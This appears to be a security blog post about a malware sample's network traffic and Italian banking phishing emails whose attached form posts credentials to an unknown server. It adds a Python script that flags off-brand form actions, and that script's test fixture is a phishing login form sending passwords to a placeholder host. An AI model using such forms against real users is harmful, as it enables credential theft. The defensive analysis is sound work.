Very interesting strings output.
The malware first resolves and communicates with: j.maxmind.com [126.96.36.199]
After this, the malware communicates via UDP with tons of other machines. Maybe other zombie clients.
Often the spam folder of my Gmail account is very interesting. I’m not a bancoposte customer, but I receive 2/3 emails per week where someone notifies me that my bank account will be locked unless I provide my credentials in the attached form.
Of course, looking into the form, the POST action turns out to be the real danger.
All POST data will be sent to an unknown server located in China.
When the URL is visited (sending fake data) via a POST or GET request, the page forwards the client to poste.it with no referer.
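The check described above can be automated when triaging HTML attachments. The following is an added example, not code from the original post: it extracts every form's action and flags targets outside the brand's domain. The sample HTML, the host collector.example.invalid and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionParser(HTMLParser):
    """Collect method, action and named fields for every <form>."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"method": (a.get("method") or "get").lower(),
                             "action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            if a.get("name"):
                self._current["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_form_actions(html, brand_domain):
    """Return one finding per form; off_brand is True when the action host
    is neither brand_domain nor one of its subdomains."""
    parser = FormActionParser()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        host = (url.hostname or "").lower()
        on_brand = host == brand_domain or host.endswith("." + brand_domain)
        findings.append({"host": host or None, "method": form["method"],
                         "fields": form["fields"],
                         "cleartext": url.scheme == "http",
                         # A relative action has no host and is not flagged.
                         "off_brand": bool(host) and not on_brand})
    return findings


# Constructed sample attachment; collector.example.invalid is a placeholder.
SAMPLE = """<html><body>
<form method="POST" action="http://collector.example.invalid/save.php">
<input type="text" name="username"><input type="password" name="password">
<input type="submit" value="Accedi"></form>
<form action="https://www.poste.it/search"><input name="q"></form>
</body></html>"""

if __name__ == "__main__":
    for finding in triage_form_actions(SAMPLE, "poste.it"):
        print(finding)
```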